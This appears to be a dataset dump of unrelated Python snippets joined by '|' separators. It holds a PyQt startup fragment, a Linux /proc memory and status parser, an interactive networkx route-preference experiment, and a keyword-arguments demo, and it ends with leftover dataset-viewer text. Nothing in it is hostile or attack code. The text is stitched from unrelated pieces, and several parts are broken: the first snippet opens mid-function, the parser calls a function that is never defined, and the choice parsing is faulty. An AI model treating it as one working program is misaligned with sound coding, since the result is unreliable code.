    # Standard PyQt bootstrap: build the app, construct and initialise the
    # window, install the traceback hook, and enter the Qt event loop.
    app = QApplication(sys.argv)
    form = Ui_MainWindow()
    form.setupUi(form)
    form.init2()  # second-stage init: wire signals and load the first map
    form.show()
    sys.excepthook = except_hook  # keep tracebacks visible from Qt slots
    sys.exit(app.exec())
|
#!/usr/bin/env python3
import sys
from os import getpid

# --- Parse /proc/meminfo once at import time --------------------------------
# find mem_total
# find positions of SwapFree and SwapTotal in /proc/meminfo
with open('/proc/meminfo') as f:
    mem_list = f.readlines()
mem_list_names = []
for s in mem_list:
    mem_list_names.append(s.split(':')[0])
# The MemAvailable field (3rd line) only exists on Linux 3.14+.
# BUGFIX: the original called the undefined name `errprint` here, which
# would raise NameError on old kernels instead of printing the warning;
# also fixed the "requied" typo in the message.
if mem_list_names[2] != 'MemAvailable':
    print('WARNING: Your Linux kernel is too old, Linux 3.14+ required',
          file=sys.stderr)
    # exit(1)
swap_total_index = mem_list_names.index('SwapTotal')
swap_free_index = swap_total_index + 1  # SwapFree follows SwapTotal
# MemTotal is the first line; strip the trailing " kB\n" suffix (4 chars).
mem_total = int(mem_list[0].split(':')[1][:-4])
# --- Locate fields in /proc/*/status ----------------------------------------
# Get names from /proc/*/status to be able to get VmRSS and VmSwap values
with open('/proc/self/status') as file:
    status_list = file.readlines()
status_names = []
for s in status_list:
    status_names.append(s.split(':')[0])
ppid_index = status_names.index('PPid')
vm_size_index = status_names.index('VmSize')
vm_rss_index = status_names.index('VmRSS')
vm_swap_index = status_names.index('VmSwap')
uid_index = status_names.index('Uid')
state_index = status_names.index('State')
try:
    # RssAnon / RssFile / RssShmem were added in Linux 4.5.
    anon_index = status_names.index('RssAnon')
    file_index = status_names.index('RssFile')
    shmem_index = status_names.index('RssShmem')
    detailed_rss = True
except ValueError:
    # Pre-4.5 kernel: RSS is not split into anon/file/shmem.
    detailed_rss = False
self_pid = str(getpid())
def self_rss():
    """Print the VmRSS (resident set size, in KiB) of this process."""
    # Index 5 of the pid_to_status() tuple is vm_rss.
    print(pid_to_status(self_pid)[5])
def pid_to_status(pid):
    """Parse /proc/<pid>/status and return the tuple
    ``(name, state, ppid, uid, vm_size, vm_rss, vm_swap)``.

    Sizes are in KiB (the trailing " kB" suffix is stripped).  Returns
    ``None`` when the process has vanished or the file cannot be parsed.
    The *_index positions are module-level globals computed at import time.
    """
    try:
        with open('/proc/' + pid + '/status') as f:
            # BUGFIX: compare line numbers with `==`, not `is`.  Identity
            # comparison of ints only works by accident for small interned
            # values and raises a SyntaxWarning on modern CPython.
            for n, line in enumerate(f):
                if n == 0:
                    # First line is "Name:\t<comm>\n"; drop the newline.
                    name = line.split('\t')[1][:-1]
                if n == state_index:
                    # Single-letter state code (R, S, D, Z, ...).
                    state = line.split('\t')[1][0]
                    continue
                if n == ppid_index:
                    ppid = line.split('\t')[1][:-1]
                    continue
                if n == uid_index:
                    uid = line.split('\t')[2]
                    continue
                if n == vm_size_index:
                    vm_size = int(line.split('\t')[1][:-4])
                    continue
                if n == vm_rss_index:
                    vm_rss = int(line.split('\t')[1][:-4])
                    continue
                if n == vm_swap_index:
                    # VmSwap is the last field we need; stop reading.
                    vm_swap = int(line.split('\t')[1][:-4])
                    break
        return name, state, ppid, uid, vm_size, vm_rss, vm_swap
    except UnicodeDecodeError:
        # Some task names are not valid UTF-8; fall back to the byte-safe
        # parser defined elsewhere in this module.
        return pid_to_status_unicode(pid)
    except FileNotFoundError:
        return None
    except ProcessLookupError:
        return None
    except ValueError:
        return None
# Smoke test: print our own RSS before and after the imports below.
self_rss()
# NOTE(review): imports belong at the top of the file; logging, subprocess
# and argparse are imported here but never used in this excerpt.
import logging
import subprocess
import argparse
self_rss()
__author__ = 'Justin'
import os
import sys
import json
import networkx as nx
from WeightFunction import weightfunction
from PathSimilarity import pathSimilarity as PS
from numpy import std,linspace,argsort,array,linspace,unique
from DisplayNetwork import networkdisplay
from GetRouteInfo import routeinfo
from GenRandomNodes import randomnodes
from ParetoFrontier import rand_paretofront
import matplotlib.pyplot as plt
from random import shuffle
import matplotlib.patches as mpatches
# DESCRIPTION: Generate Estimate of Factor Weight Error Distribution
#
# Initialize data
numweights = 20
weights = linspace(0,1,numweights)  # candidate Zen-weight grid on [0, 1]
weightchosen = {weight:0 for weight in weights}  # times each weight was consistent with the user's pick
uniquerange = [3,5]  # min/max number of unique Pareto routes to generate
numiter = 30  # number of user-feedback rounds
# The name entered here selects the per-person output folder used when
# saving results at the end of the script.
print('Enter your first name: ')
person = sys.stdin.readline()[0:-1]
# Load Network
cwd = os.getcwd()
filename = "OSMNetworkReducedSet.gexf"
filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data','Networks',filename))
fh=open(filepath,'rb')
G = nx.read_gexf(fh)
# Main feedback loop: each round builds a set of Pareto-optimal routes,
# shows them, asks the user to choose one, and tallies which Zen-weights
# are consistent with that choice.
for _ in range(0,numiter,1):
    # Generate Pareto Frontier
    cluster_weights, paths, pathsinfo = rand_paretofront(G,weights,['Zenness','currenttime'],
                                                         uniquerange[0],uniquerange[1],'Zenness')
    # Print Route Information
    print('------------------------------------------------------------------------------')
    print('/////////////////////////////////////////////////////////////////////////////')
    Zenscore_pts = []
    time_pts = []
    for index,path in enumerate(paths):
        print('---------------------------------------')
        print('Route '+str(index)+':')
        print('-time(min):',pathsinfo[index]['currenttime']/60)
        print('-zenness:',pathsinfo[index]['Zenness'])
        print('----------------')
        # Differences relative to route 0.
        print('-zen diff:',pathsinfo[0]['Zenness']-pathsinfo[index]['Zenness'])
        print('-time diff:',(pathsinfo[index]['currenttime']-pathsinfo[0]['currenttime'])/60)
        print('---------------------------------------')
        Zenscore_pts.append(pathsinfo[index]['Zenness'])
        time_pts.append(pathsinfo[index]['currenttime']/60)
    # Plot All Route Options
    routestyles=[]
    listcolors = ['#cc9999','#ccff99','#999933','#ffcc99','#996633','#767777']
    # listcolors = ['#ffff4d','#66ff66','#00cd00','#008b00','#006400','#cc9999','#ccff99','#999933']
    patches = []
    # Legend: one coloured patch per route.
    for index,color in enumerate(listcolors):
        patch = mpatches.Patch(color=color, label='Route '+str(index))
        patches.append(patch)
    plt.legend(handles = patches)
    plt.show()
    for index in range(0,len(paths),1):
        # NOTE: `dict` shadows the builtin here (pre-existing style).
        dict = {'color': listcolors[index],'width': 10,'name': 'Route '+str(index)+':'}
        routestyles.append(dict)
    Zen_std = std(nx.get_edge_attributes(G,'Zenness').values())
    networkdisplay(G,routes=paths,graphstyle='RdYlBu_r',routestyles = routestyles,
                   weightstring='Zenness',normValue=6.0*Zen_std, title='Pareto Optimal Routes')
    # # Plot Pareto Frontier
    # fig,ax = plt.subplots()
    # MIN = min(time_pts)
    # time_pts[:]=[value/MIN for value in time_pts] # Normalize time to minimum value
    # ax.scatter(Zenscore_pts,time_pts,s=10)
    # plt.title('Pareto Frontier Example')
    # plt.xlabel('Zenscores')
    # plt.ylabel('Time Normalized to Fastest Route')
    #
    # for index,weightgroup in enumerate(cluster_weights):
    #     if(len(weightgroup)==1):
    #         a = "%.2f" % weightgroup[0]
    #         ax.annotate('['+a+']',(Zenscore_pts[index],time_pts[index]))
    #     else:
    #         a = "%.2f" % weightgroup[0]
    #         b = "%.2f" % weightgroup[-1]
    #         ax.annotate('['+a+'-'+b+']',(Zenscore_pts[index],time_pts[index]))
    # plt.show()
    # Get User Feedback:
    print('Options:')
    print('Enter you answer indicated by number 0-'+str(len(paths)-1)+'')
    print('OR')
    print("'s' for skip and 'r' for refine:")
    choice = sys.stdin.readline()[0:-1]
    if(choice == 'r'):
        # Prune Options:
        print('Options:')
        print('Enter list separated by commas of choices to view')
        print('Example => 1,2,3')
        string = sys.stdin.readline()
        # NOTE(review): taking every other character only works for
        # single-digit route numbers separated by single commas.
        chosenindices = [int(element) for index,element in enumerate(string) if(index % 2 == 0) ]
        print('Chosen:',chosenindices)
        # Plot All Chosen Options
        routestyles=[]
        for index in chosenindices:
            dict = {'color': listcolors[index],'width': 10,'name': 'Route '+str(index)+':'}
            routestyles.append(dict)
        chosenpaths = [paths[i] for i in chosenindices]
        # NOTE(review): this indexes `paths`, not `pathsinfo` — looks like a
        # copy-paste slip, but the variable is unused afterwards.
        chosenpathinfos = [paths[i] for i in chosenindices]
        Zen_std = std(nx.get_edge_attributes(G,'Zenness').values())
        networkdisplay(G,routes=chosenpaths,graphstyle='RdYlBu_r',routestyles = routestyles,
                       weightstring='Zenness',normValue=6.0*Zen_std, title='Pareto Optimal Routes')
        # Get Refined User Feedback:
        print('Options:')
        print('Enter you answer indicated by number 0-'+str(len(paths)-1)+'')
        print('OR')
        print("'s' for skip and 'r' for refine:")
        choice = sys.stdin.readline()[0:-1]
    if(choice != 's'):
        # Save contribution to weight error distribution
        # Every weight in the chosen route's cluster counts as "chosen".
        for weight in cluster_weights[int(choice)]:
            weightchosen[weight] += 1
# Print Estimate of Factor Weight Error Distribution
fig,ax = plt.subplots()
x = sorted(weightchosen.keys())
# Error probability = fraction of rounds in which the weight was NOT chosen.
y = [1.0-float(weightchosen[key])/float(numiter) for key in x]
ax.bar(x,y)
ax.set_xlim([0,1])
plt.title('Probability of Error vs. Zenweight')
plt.xlabel('Zenweight')
plt.ylabel('Prob. of Error')
plt.show()
# Save Information
# NOTE(review): `folder = filepath = ...` double assignment is harmless but
# the intent appears to be just `folder = ...`.
folder = filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data',person,'GradientOptimization'))
filename = "ErrorDistribution3.json"
filepath = os.path.abspath(os.path.join(folder,filename))
with open(filepath, 'w') as outfile:
    json.dump(y, outfile)
filename = "zenweights3.json"
filepath = os.path.abspath(os.path.join(folder,filename))
with open(filepath, 'w') as outfile:
    json.dump(x, outfile)
# # Loop through weight values
# numweights = 5
# zenweights = linspace(0.1,0.4,numweights)
# shuffle(zenweights)
# iter_per_weight = 8
#
# errorProbs = []
#
# for zenweight in zenweights:
# #Generate Probability of Error
# choices = []
#
# #-- User Weight Testing Loop-----------------------------------------------------
# while(len(choices)<iter_per_weight):
# zenRoute = []
# fastestRoute = []
#
# pathsimilarity = 1.0
# maxsimilarity = 0.7
# # Keep searching if routes are similar
# while(pathsimilarity > maxsimilarity):
#
# # I) Generate Random Source and Destination
# lons = nx.get_node_attributes(G,'lon')
# lats = nx.get_node_attributes(G,'lat')
# origin,destination = randomnodes(G,distancelimit=1) # distancelimit in miles
#
# # II) Generate Best User-Weighted Route
#
# # Update Total Edge Weights
# timeweight = 1-zenweight
# weights = [zenweight,timeweight]
# keys = ['Zenness','currenttime']
# for edge in G.edges():
# nodeA = edge[0]
# nodeB = edge[1]
# dict = G[nodeA][nodeB]
# G[nodeA][nodeB]['weight'] = weightfunction(weights,dict,keys)
#
# # Djkistra's Shortest Path
# zenRoute = nx.shortest_path(G,source = origin,target = destination,weight = 'weight')
# zenRouteInfo = routeinfo(G,zenRoute,['currenttime','Zenness'])
#
# # III) Generate Fastest Route
#
# # Djkistra's Shortest Path
# fastestRoute = nx.shortest_path(G,source = origin,target = destination,weight = 'currenttime')
# fastestRouteInfo = routeinfo(G,fastestRoute,['currenttime','Zenness'])
#
# # Check Path Similarity
# pathsimilarity= PS(zenRoute,fastestRoute)
#
#
# # IV) Plot Network and Routes
# routestyles = [{'color': '#ccffcc','width': 20,'name': 'Zen Route'},
# {'color': '#ffff4d','width': 10,'name': 'Fastest Route'}] # greenish then yellowish
# Zen_std = std(nx.get_edge_attributes(G,'Zenness').values())
#
# networkdisplay(G,routes=[zenRoute,fastestRoute],graphstyle='RdYlBu_r',routestyles = routestyles,
# weightstring='Zenness',normValue=6.0*Zen_std, title='Example')
#
#
# # V) Print Route Information
# print('---------------------------------------')
# print('Source:',[lats[origin],lons[origin]])
# print('Destination',[lats[destination],lons[destination]])
# print('---------------------------------------')
# print('ZenRoute:')
# print('-time(min):',zenRouteInfo['currenttime']/60)
# print('-zenness:',zenRouteInfo['Zenness'])
# print('\n')
# print('FastestRoute:')
# print('-time(min):',fastestRouteInfo['currenttime']/60)
# print('-zenness:',fastestRouteInfo['Zenness'])
# print('---------------------------------------')
# print('ZenDiff: '+str(fastestRouteInfo['Zenness']-zenRouteInfo['Zenness']))
# print('TimeDiff(min): '+str(zenRouteInfo['currenttime']/60-fastestRouteInfo['currenttime']/60))
# print('---------------------------------------')
#
#
# # VI) Get User Feedback:
# print('Options:')
# print('1)Zen'); print('2)Fastest'); print('3)Skip')
# print('\nEnter you answer indicated by number 1-3:')
# choice = sys.stdin.readline()[0:-1]
# # VII) Update User Weight
# if(choice == '1'):
# choices.append(0)
# elif(choice == '2'):
# choices.append(1)
#
# #-- END User Weight Testing Loop-----------------------------------------------------
# print(choices)
# errorProb = float(sum(choices))/float(len(choices))
# errorProbs.append(errorProb)
# print(errorProb)
#
# # Resort Data
#
# indices = argsort(array(zenweights))
# zenweights.sort()
# errorProbs = [errorProbs[index] for index in indices]
#
# # Print Estimate of Factor Weight Error Distribution
#
# fig,ax = plt.subplots()
# ax.bar(zenweights,errorProbs)
# ax.set_xlim([0,1])
# plt.title('Probability of Error vs. Zenweight')
# plt.xlabel('Zenweight')
# plt.ylabel('Prob. of Error')
# plt.show()
#
# # Save Information
#
# folder = filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data','GradientOptimization'))
#
# filename = "ErrorDistribution2.json"
# filepath = os.path.abspath(os.path.join(folder,filename))
# with open(filepath, 'w') as outfile:
# json.dump(errorProbs, outfile)
#
# filename = "zenweights2.json"
# weights = zenweights.tolist()
# filepath = os.path.abspath(os.path.join(folder,filename))
# with open(filepath, 'w') as outfile:
# json.dump(weights, outfile)
|
def h(a, b=1, c=1):
    """Combine three digits into one number: hundreds, tens and units."""
    return 100 * a + 10 * b + c
print(h(1, 2, 3)) # all three arguments given => 123
print(h(2)) # only the first argument; b and c use their defaults => 211
print(h(2, c=2)) # first argument and c set; b keeps its default => 212
print(h(a=2, c=3)) # a and c passed by keyword => 213
print(h(b=2, a=1, c=3)) # with keyword arguments the order does not matter => 123
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.